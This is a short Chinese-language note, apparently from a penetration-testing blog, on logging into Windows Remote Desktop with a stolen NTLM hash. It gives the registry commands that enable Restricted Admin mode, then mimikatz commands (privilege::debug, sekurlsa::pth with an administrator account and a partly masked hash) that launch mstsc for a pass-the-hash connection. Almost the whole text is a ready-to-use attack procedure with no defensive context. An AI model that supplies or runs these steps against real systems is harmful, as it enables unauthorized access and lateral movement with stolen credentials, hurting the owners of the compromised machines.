利用mimikatz使用NTLM凭证登录RDP

hash登陆RDP远程桌面

第一步：开启Restricted Admin mode

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin" // 查看是否已开启，0x0则表示开启

第二步：利用mimikatz使用NTLM凭证登录RDP

privilege::debug
sekurlsa::pth /user:administrator /domain:. /ntlm:3667d84470exxxxxxxxx0a5ad69458 "/run:mstsc.exe /restrictedadmin"
// 会弹出mstsc窗口，输入正确的IP地址即可连接

参考

• https://xz.aliyun.com/t/8574